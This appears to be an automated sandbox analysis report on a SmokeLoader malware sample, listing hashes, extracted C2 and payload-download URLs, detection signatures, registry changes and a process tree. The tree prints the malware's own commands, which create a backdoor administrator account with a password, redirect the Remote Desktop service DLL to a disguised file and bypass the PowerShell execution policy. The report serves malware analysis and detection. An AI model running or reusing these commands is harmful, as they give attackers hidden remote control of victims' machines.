Analysis
- max time kernel: 150s
- max time network: 148s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 28-10-2021 22:54
Static task: static1
Behavioral task: behavioral1
- Sample: 60cdab374236b2efe894bce090719365.exe
- Resource: win7-en-20211014
Behavioral task: behavioral2
- Sample: 60cdab374236b2efe894bce090719365.exe
- Resource: win10-en-20210920
General
- Target: 60cdab374236b2efe894bce090719365.exe
- Size: 339KB
- MD5: 60cdab374236b2efe894bce090719365
- SHA1: fe35e203023a64e0831bdb8b4b27fc28e1feb0db
- SHA256: 0c4a2dc11b12ad8545e5397eff8bcde53238c2283905e7b49610f9cafa779800
- SHA512: 8654d91ab7c1d824c9802e2395dad3f224fc2417599c359c3d80a89b97b1331c78755369aacd2ec00dea757e165d0b7df87c3dc3ae92574ac735e5e4ee7f4da9
Malware Config
Extracted
- URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
- Family: smokeloader
- Version: 2020
- C2:
  - http://brandyjaggers.com/upload/
  - http://andbal.com/upload/
  - http://alotofquotes.com/upload/
  - http://szpnc.cn/upload/
  - http://uggeboots.com/upload/
  - http://100klv.com/upload/
  - http://rapmusic.at/upload/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow | pid | process
  58 | 952 | powershell.exe
  60 | 952 | powershell.exe
  62 | 952 | powershell.exe
  63 | 952 | powershell.exe
  65 | 952 | powershell.exe
  67 | 952 | powershell.exe
  69 | 952 | powershell.exe
  72 | 952 | powershell.exe
  74 | 952 | powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoC)
  Processes:
  pid | process
  1828 | 72DA.exe
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
  Processes:
  resource | yara_rule
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx
- Deletes itself (1 IoC)
  Processes:
  pid | process
  3036 | (not shown)
- Loads dropped DLL (2 IoCs)
  Processes:
  pid | process
  2468 | (not shown)
  2468 | (not shown)
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes:
  description | ioc | process
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC748.tmp | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tgk3imw3.3fl.ps1 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC705.tmp | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_yvgdfbtg.coa.psm1 | powershell.exe
  File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC736.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC747.tmp | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC725.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes:
  description | ioc | process
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 60cdab374236b2efe894bce090719365.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 60cdab374236b2efe894bce090719365.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 60cdab374236b2efe894bce090719365.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" | powershell.exe
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description | flow | ioc
  HTTP User-Agent header | 65 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 60 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 62 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 63 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
  pid | process
  4088 | 60cdab374236b2efe894bce090719365.exe
  4088 | 60cdab374236b2efe894bce090719365.exe
  3036 | (not shown; this row is repeated for each of the remaining entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes:
  pid | process
  3036 | (not shown)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid | process
  640 | (not shown)
  640 | (not shown)
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes:
  pid | process
  4088 | 60cdab374236b2efe894bce090719365.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (tokens listed in the order recorded):
  - pid 716, powershell.exe: Token: SeDebugPrivilege
  - pid 1688, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - pid 3628, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - pid 1648, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes:
  pid | process
  3036 | (not shown)
  3036 | (not shown)
- Suspicious use of SendNotifyMessage (2 IoCs)
  Processes:
  pid | process
  3036 | (not shown)
  3036 | (not shown)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (each of the 32 rows below is recorded twice in the report):
  description | pid | process | target process
  PID 3036 wrote to memory of 1828 | 3036 | (not shown) | 72DA.exe
  PID 1828 wrote to memory of 716 | 1828 | 72DA.exe | powershell.exe
  PID 716 wrote to memory of 1252 | 716 | powershell.exe | csc.exe
  PID 1252 wrote to memory of 2136 | 1252 | csc.exe | cvtres.exe
  PID 716 wrote to memory of 1688 | 716 | powershell.exe | powershell.exe
  PID 716 wrote to memory of 3628 | 716 | powershell.exe | powershell.exe
  PID 716 wrote to memory of 1648 | 716 | powershell.exe | powershell.exe
  PID 716 wrote to memory of 3272 | 716 | powershell.exe | reg.exe
  PID 716 wrote to memory of 3800 | 716 | powershell.exe | reg.exe
  PID 716 wrote to memory of 3460 | 716 | powershell.exe | reg.exe
  PID 716 wrote to memory of 4092 | 716 | powershell.exe | net.exe
  PID 4092 wrote to memory of 3860 | 4092 | net.exe | net1.exe
  PID 716 wrote to memory of 3144 | 716 | powershell.exe | cmd.exe
  PID 3144 wrote to memory of 2324 | 3144 | cmd.exe | cmd.exe
  PID 2324 wrote to memory of 656 | 2324 | cmd.exe | net.exe
  PID 656 wrote to memory of 1404 | 656 | net.exe | net1.exe
  PID 716 wrote to memory of 2220 | 716 | powershell.exe | cmd.exe
  PID 2220 wrote to memory of 3232 | 2220 | cmd.exe | cmd.exe
  PID 3232 wrote to memory of 2196 | 3232 | cmd.exe | net.exe
  PID 2196 wrote to memory of 3876 | 2196 | net.exe | net1.exe
  PID 2948 wrote to memory of 952 | 2948 | cmd.exe | net.exe
  PID 952 wrote to memory of 2392 | 952 | net.exe | net1.exe
  PID 3488 wrote to memory of 1536 | 3488 | cmd.exe | net.exe
  PID 1536 wrote to memory of 3628 | 1536 | net.exe | net1.exe
  PID 3532 wrote to memory of 2516 | 3532 | cmd.exe | net.exe
  PID 2516 wrote to memory of 1444 | 2516 | net.exe | net1.exe
  PID 380 wrote to memory of 1960 | 380 | cmd.exe | net.exe
  PID 1960 wrote to memory of 4020 | 1960 | net.exe | net1.exe
  PID 1936 wrote to memory of 3800 | 1936 | cmd.exe | net.exe
  PID 3800 wrote to memory of 1992 | 3800 | net.exe | net1.exe
  PID 2152 wrote to memory of 2000 | 2152 | cmd.exe | net.exe
  PID 2000 wrote to memory of 3664 | 2000 | net.exe | net1.exe
Processes (process tree; nesting follows the depth recorded for each process)
- C:\Users\Admin\AppData\Local\Temp\60cdab374236b2efe894bce090719365.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\60cdab374236b2efe894bce090719365.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
- C:\Users\Admin\AppData\Local\Temp\72DA.exe (depth 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\72DA.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lddmhxjh\lddmhxjh.cmdline"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BA2.tmp" "c:\Users\Admin\AppData\Local\Temp\lddmhxjh\CSC9E2A9D0A82214121ABF59FA852F7FDB4.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe (depth 3)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (depth 4)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (depth 5)
          Command line: net start rdpdr
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (depth 6)
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (depth 5)
          Command line: net start TermService
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (depth 6)
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc AwpZwkyN /add
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc AwpZwkyN /add
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc AwpZwkyN /add
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc AwpZwkyN
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc AwpZwkyN
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc AwpZwkyN
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic path win32_VideoController get name
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic CPU get NAME
- C:\Windows\System32\cmd.exe (depth 1)
